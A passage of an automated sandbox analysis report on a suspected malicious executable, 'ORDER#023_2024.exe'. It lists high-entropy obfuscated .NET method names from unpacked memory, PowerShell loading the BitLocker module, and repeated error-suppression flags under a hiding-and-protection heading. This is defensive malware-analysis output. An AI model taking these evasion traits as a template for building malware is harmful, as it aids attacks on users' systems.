                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 5_2_067F26B0 push es; ret 5_2_067F26C0
                        Source: ORDER#023_2024.exeStatic PE information: section name: .text entropy: 7.767634101805021
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, PRGi5AO7gC1weP7l0w.csHigh entropy of concatenated method names: 'uyMR1wbD1g', 'B8hRA6y39m', 'ChoR6IZ6Er', 'VMcRpx58is', 'onTRiZ25lA', 'MSrRXXLCr0', 'jcuRhA0hyO', 'Yp5RjgslrC', 's7eR0YhYQt', 'L91RIMKOur'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, X5DkZbFK444lv0qKDqV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sTdolwte3v', 'oc9oLxCqUf', 'GNgou0DbNW', 'Qa6ooxyhOS', 'vxdovZuO5m', 'r42oHJWXLC', 'OwGoVMgsWy'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, cLJtNBzKxUGKXEZnr5.csHigh entropy of concatenated method names: 'H9RL25xK7x', 'u2pL1Vyp5h', 'ymRLAvKGD9', 'sOxL6bFmW7', 'Lb2Lp3dDlG', 'GCRLi8Scyr', 'OevLXXOfqr', 'R6BLVvNcV2', 'qW0L7B4E22', 'GRsLPLF2mj'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, pUkUmcdcWxcrZPseP1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oInQBLcYOC', 'BBJQrcVCUC', 'AlGQzR07rf', 'FiRmDXrdAj', 'iJ2mFqss8r', 'OUvmQh2Xd3', 'lPMmmMIDJC', 'pIH2Vxey19axAhHM8Tl'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, gQaaabgjPI9S2v7bX6.csHigh entropy of concatenated method names: 'oiFWyX4tff', 'LASWrqsW2F', 'OW53DURc10', 'NTi3FDMbYu', 'dq9WIqenf6', 'MnYWYTWelW', 'PwbWOP4TGd', 'ABhWZQLlem', 'P9IWEFFp92', 'fJsWT7d0aS'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, deQuraBNTFd11kZQNZ.csHigh entropy of concatenated method names: 'yKSl6CaVLc', 'LTolpqy5hx', 'onNlGp1cBn', 'S61liilGjq', 'JeVlXCaHss', 'kFTlN6ZiEM', 'IdAlhecOkl', 'gi0ljjl2f4', 'qXEl5sqjAM', 'W3wl07RycF'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, EsI8Kis0mhboOFwANE.csHigh entropy of concatenated method names: 'eIBS8FAr9e', 'WkmSUkPLbk', 'dt0dGtuLbD', 'mBwdisagaK', 'vkedXyBerU', 'BsTdNQofiJ', 'j5odhgJFFF', 'fZrdjExa0M', 'f7ud59ab3y', 'x9Ud0uifn6'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, aYL7OIagM3xfR7HlyX.csHigh entropy of concatenated method names: 'ubNWqrKAqF', 'mlJW4YFO7n', 'ToString', 'S6MWe9NBO0', 'vEHWC8Y7C1', 'qC2WdojVk0', 'SNEWSiPDXD', 'uFWWkwGxdS', 'lpjWw6rgPi', 'fNnWJP8pTk'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, g58dCb1xNyIgM5il43.csHigh entropy of concatenated method names: 'mYLCZfZKaD', 'BCqCEpZlA2', 'DjnCTqoapT', 'u3rCaSMWTw', 'hOGCMt3ITl', 'HI4Cgt700P', 'ECaCcETmL3', 'J9gCy0m2Ut', 'fZJCBVQ5gg', 'D5HCrSuvbX'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, sPMQ5MZRKlspA1tXW9.csHigh entropy of concatenated method names: 'Jusx01hfuZ', 'i3wxYgSePK', 'QYixZd7oba', 'qkSxEdKyxn', 'scExpahyFt', 'BcQxGtLmuS', 'FMfxinjEjC', 'yW4xXYpMf7', 'BFqxNvM6Jm', 'df9xhR50YF'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LCgYKpJHO2S8TItW51.csHigh entropy of concatenated method names: 'AZsmfhwljj', 'QhCmeBZH42', 'FW0mC0MJQo', 'vCWmdlnH4r', 'J6WmSH8ALa', 'AaYmkTEO6U', 'Sn2mw2OOvd', 'k7imJDjdP7', 'yTwm9f919W', 'GgYmqgbh3I'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, LTJ54hcgJyVq4qwIaU.csHigh entropy of concatenated method names: 'NTdlxUw5Yi', 'AvtlWpMOAc', 'VnjllNXyIM', 'QZilua5ACY', 'd8ulvVhYUR', 'Eb6lVyP0ir', 'Dispose', 'LiH3e0oDQA', 'VMt3CpclcK', 'dfZ3dvaehy'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, jQXKVCCbaUgppx8D74.csHigh entropy of concatenated method names: 'Dispose', 'WVqFB4qwIa', 'dr7Qp55EfL', 'IwEoMVKlAE', 'C17FrE9QUh', 'QlnFzyEATM', 'ProcessDialogKey', 'WlmQDeQura', 'KTFQFd11kZ', 'bNZQQRHRdJ'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, YhvwW2A0kpaKtdhK3I.csHigh entropy of concatenated method names: 'cFudnnvHJC', 'Vvad2SXZuC', 'kWBd1JVItW', 'RASdANf7MN', 'yQDdxV5KiW', 'dxVdtD5aF2', 'kLedWYVqc6', 'qCGd3YiRq4', 'caldl8GBfw', 'soVdLsMQlm'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, dFDAWt5kTHYbMkJMpD.csHigh entropy of concatenated method names: 'mCYw7Q9bSS', 'oSLwPSlO6P', 'sA1wbrg10j', 'BRRwnRyWiV', 'iEDw8JNsWh', 'Fcww2K5ee0', 'JgCwUUfqXC', 'Wtjw1fFmxI', 'pFTwAWPhit', 'Q5wwsPIOqt'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, z6XscJ6vdpxEoclvPA.csHigh entropy of concatenated method names: 'zERkfrkuwE', 'oQMkCvoqgZ', 'EerkSOABVR', 'nA0kw1WWim', 'rw9kJJOG4r', 'JJMSMsEpMp', 'S05SgHQXR8', 'gwQScE8Afn', 'VMeSyVqbZH', 'O5aSB7AxqS'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, nHRdJqrWBCQAiP7Qb0.csHigh entropy of concatenated method names: 'eHhLdxe3Jw', 'mSDLS8KwlJ', 'IZlLkegYqr', 'QdaLwwNyy7', 'XbNLlhfPBO', 'RXELJB7LJ2', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, N2J62jQc7ybumY3Xkb.csHigh entropy of concatenated method names: 'TeKbPa7X5', 'If7nTIXjK', 'BoV2LPw0M', 'xgkUaUExq', 'XT9Ag5TTO', 'ifEsnG3eS', 'ia2f0QNC5IjP21oXAL', 'hwMdhlBuHBxlNrZbD8', 'xhi3GZLct', 'Jv2LTU2FP'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, raADa7FQtYsyBmlXbnb.csHigh entropy of concatenated method names: 'ToString', 'Xslu1MbqWw', 'WTjuAOyy5w', 'sqqusHA2ap', 'ReYu6x3CSy', 'ds9upRSG5G', 'T5wuGBlBcb', 'K8Huinot7u', 'fAkJQFjrZEOF88mdGaV', 'JqFNkEjT0fXwx4I2QRS'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, NowMJVFDBjDQLXHi9mx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vUHLIGymjO', 'YVbLYQZrmH', 'cqULONTT0Y', 'XNnLZlFDXg', 'AR1LEg12r9', 'Fd8LTZeHTH', 'rSnLaut5Da'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, jw7ygmFFcUaSatAc2D4.csHigh entropy of concatenated method names: 'SBMLr4Cor2', 'fq6LzkCbZF', 'fFouDfmpBp', 'iq2uFtbhqq', 'CRouQYUnNU', 'rwNumGSdVD', 'I0ouKCWW5s', 'KYEufuEcmA', 'wuwue7j65L', 'tSUuCyXwgZ'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, JTgEbKhbABArjRRoho.csHigh entropy of concatenated method names: 'IWZweIPyqx', 'DiTwd0Mmm3', 'FVkwkbZtlJ', 'QtikrCCbQY', 'oGAkzJ5xXY', 'pBVwDaPf1t', 'ajwwFDitpy', 'l0UwQcZcJ5', 'Oa8wm8Y2nS', 'n4rwKhgmQ0'
                        Source: 0.2.ORDER#023_2024.exe.76f0000.5.raw.unpack, nhHaQcK5gEaIGUBLTo.csHigh entropy of concatenated method names: 'VPCFw58dCb', 'oNyFJIgM5i', 'C0kFqpaKtd', 'LK3F4IAsI8', 'bwAFxNEn6X', 'FcJFtvdpxE', 'OWPRsPT4RQ9gGmUnbd', 'KE9OjgdIlbiKMmunlB', 'H59FFgOHEA', 'gigFmBudIF'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, PRGi5AO7gC1weP7l0w.csHigh entropy of concatenated method names: 'uyMR1wbD1g', 'B8hRA6y39m', 'ChoR6IZ6Er', 'VMcRpx58is', 'onTRiZ25lA', 'MSrRXXLCr0', 'jcuRhA0hyO', 'Yp5RjgslrC', 's7eR0YhYQt', 'L91RIMKOur'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, X5DkZbFK444lv0qKDqV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sTdolwte3v', 'oc9oLxCqUf', 'GNgou0DbNW', 'Qa6ooxyhOS', 'vxdovZuO5m', 'r42oHJWXLC', 'OwGoVMgsWy'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, cLJtNBzKxUGKXEZnr5.csHigh entropy of concatenated method names: 'H9RL25xK7x', 'u2pL1Vyp5h', 'ymRLAvKGD9', 'sOxL6bFmW7', 'Lb2Lp3dDlG', 'GCRLi8Scyr', 'OevLXXOfqr', 'R6BLVvNcV2', 'qW0L7B4E22', 'GRsLPLF2mj'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, pUkUmcdcWxcrZPseP1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oInQBLcYOC', 'BBJQrcVCUC', 'AlGQzR07rf', 'FiRmDXrdAj', 'iJ2mFqss8r', 'OUvmQh2Xd3', 'lPMmmMIDJC', 'pIH2Vxey19axAhHM8Tl'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, gQaaabgjPI9S2v7bX6.csHigh entropy of concatenated method names: 'oiFWyX4tff', 'LASWrqsW2F', 'OW53DURc10', 'NTi3FDMbYu', 'dq9WIqenf6', 'MnYWYTWelW', 'PwbWOP4TGd', 'ABhWZQLlem', 'P9IWEFFp92', 'fJsWT7d0aS'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, deQuraBNTFd11kZQNZ.csHigh entropy of concatenated method names: 'yKSl6CaVLc', 'LTolpqy5hx', 'onNlGp1cBn', 'S61liilGjq', 'JeVlXCaHss', 'kFTlN6ZiEM', 'IdAlhecOkl', 'gi0ljjl2f4', 'qXEl5sqjAM', 'W3wl07RycF'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, EsI8Kis0mhboOFwANE.csHigh entropy of concatenated method names: 'eIBS8FAr9e', 'WkmSUkPLbk', 'dt0dGtuLbD', 'mBwdisagaK', 'vkedXyBerU', 'BsTdNQofiJ', 'j5odhgJFFF', 'fZrdjExa0M', 'f7ud59ab3y', 'x9Ud0uifn6'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, aYL7OIagM3xfR7HlyX.csHigh entropy of concatenated method names: 'ubNWqrKAqF', 'mlJW4YFO7n', 'ToString', 'S6MWe9NBO0', 'vEHWC8Y7C1', 'qC2WdojVk0', 'SNEWSiPDXD', 'uFWWkwGxdS', 'lpjWw6rgPi', 'fNnWJP8pTk'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, g58dCb1xNyIgM5il43.csHigh entropy of concatenated method names: 'mYLCZfZKaD', 'BCqCEpZlA2', 'DjnCTqoapT', 'u3rCaSMWTw', 'hOGCMt3ITl', 'HI4Cgt700P', 'ECaCcETmL3', 'J9gCy0m2Ut', 'fZJCBVQ5gg', 'D5HCrSuvbX'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, sPMQ5MZRKlspA1tXW9.csHigh entropy of concatenated method names: 'Jusx01hfuZ', 'i3wxYgSePK', 'QYixZd7oba', 'qkSxEdKyxn', 'scExpahyFt', 'BcQxGtLmuS', 'FMfxinjEjC', 'yW4xXYpMf7', 'BFqxNvM6Jm', 'df9xhR50YF'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LCgYKpJHO2S8TItW51.csHigh entropy of concatenated method names: 'AZsmfhwljj', 'QhCmeBZH42', 'FW0mC0MJQo', 'vCWmdlnH4r', 'J6WmSH8ALa', 'AaYmkTEO6U', 'Sn2mw2OOvd', 'k7imJDjdP7', 'yTwm9f919W', 'GgYmqgbh3I'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, LTJ54hcgJyVq4qwIaU.csHigh entropy of concatenated method names: 'NTdlxUw5Yi', 'AvtlWpMOAc', 'VnjllNXyIM', 'QZilua5ACY', 'd8ulvVhYUR', 'Eb6lVyP0ir', 'Dispose', 'LiH3e0oDQA', 'VMt3CpclcK', 'dfZ3dvaehy'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, jQXKVCCbaUgppx8D74.csHigh entropy of concatenated method names: 'Dispose', 'WVqFB4qwIa', 'dr7Qp55EfL', 'IwEoMVKlAE', 'C17FrE9QUh', 'QlnFzyEATM', 'ProcessDialogKey', 'WlmQDeQura', 'KTFQFd11kZ', 'bNZQQRHRdJ'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, YhvwW2A0kpaKtdhK3I.csHigh entropy of concatenated method names: 'cFudnnvHJC', 'Vvad2SXZuC', 'kWBd1JVItW', 'RASdANf7MN', 'yQDdxV5KiW', 'dxVdtD5aF2', 'kLedWYVqc6', 'qCGd3YiRq4', 'caldl8GBfw', 'soVdLsMQlm'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, dFDAWt5kTHYbMkJMpD.csHigh entropy of concatenated method names: 'mCYw7Q9bSS', 'oSLwPSlO6P', 'sA1wbrg10j', 'BRRwnRyWiV', 'iEDw8JNsWh', 'Fcww2K5ee0', 'JgCwUUfqXC', 'Wtjw1fFmxI', 'pFTwAWPhit', 'Q5wwsPIOqt'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, z6XscJ6vdpxEoclvPA.csHigh entropy of concatenated method names: 'zERkfrkuwE', 'oQMkCvoqgZ', 'EerkSOABVR', 'nA0kw1WWim', 'rw9kJJOG4r', 'JJMSMsEpMp', 'S05SgHQXR8', 'gwQScE8Afn', 'VMeSyVqbZH', 'O5aSB7AxqS'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, nHRdJqrWBCQAiP7Qb0.csHigh entropy of concatenated method names: 'eHhLdxe3Jw', 'mSDLS8KwlJ', 'IZlLkegYqr', 'QdaLwwNyy7', 'XbNLlhfPBO', 'RXELJB7LJ2', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, N2J62jQc7ybumY3Xkb.csHigh entropy of concatenated method names: 'TeKbPa7X5', 'If7nTIXjK', 'BoV2LPw0M', 'xgkUaUExq', 'XT9Ag5TTO', 'ifEsnG3eS', 'ia2f0QNC5IjP21oXAL', 'hwMdhlBuHBxlNrZbD8', 'xhi3GZLct', 'Jv2LTU2FP'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, raADa7FQtYsyBmlXbnb.csHigh entropy of concatenated method names: 'ToString', 'Xslu1MbqWw', 'WTjuAOyy5w', 'sqqusHA2ap', 'ReYu6x3CSy', 'ds9upRSG5G', 'T5wuGBlBcb', 'K8Huinot7u', 'fAkJQFjrZEOF88mdGaV', 'JqFNkEjT0fXwx4I2QRS'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, NowMJVFDBjDQLXHi9mx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vUHLIGymjO', 'YVbLYQZrmH', 'cqULONTT0Y', 'XNnLZlFDXg', 'AR1LEg12r9', 'Fd8LTZeHTH', 'rSnLaut5Da'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, jw7ygmFFcUaSatAc2D4.csHigh entropy of concatenated method names: 'SBMLr4Cor2', 'fq6LzkCbZF', 'fFouDfmpBp', 'iq2uFtbhqq', 'CRouQYUnNU', 'rwNumGSdVD', 'I0ouKCWW5s', 'KYEufuEcmA', 'wuwue7j65L', 'tSUuCyXwgZ'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, JTgEbKhbABArjRRoho.csHigh entropy of concatenated method names: 'IWZweIPyqx', 'DiTwd0Mmm3', 'FVkwkbZtlJ', 'QtikrCCbQY', 'oGAkzJ5xXY', 'pBVwDaPf1t', 'ajwwFDitpy', 'l0UwQcZcJ5', 'Oa8wm8Y2nS', 'n4rwKhgmQ0'
                        Source: 0.2.ORDER#023_2024.exe.3d89820.2.raw.unpack, nhHaQcK5gEaIGUBLTo.csHigh entropy of concatenated method names: 'VPCFw58dCb', 'oNyFJIgM5i', 'C0kFqpaKtd', 'LK3F4IAsI8', 'bwAFxNEn6X', 'FcJFtvdpxE', 'OWPRsPT4RQ9gGmUnbd', 'KE9OjgdIlbiKMmunlB', 'H59FFgOHEA', 'gigFmBudIF'

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
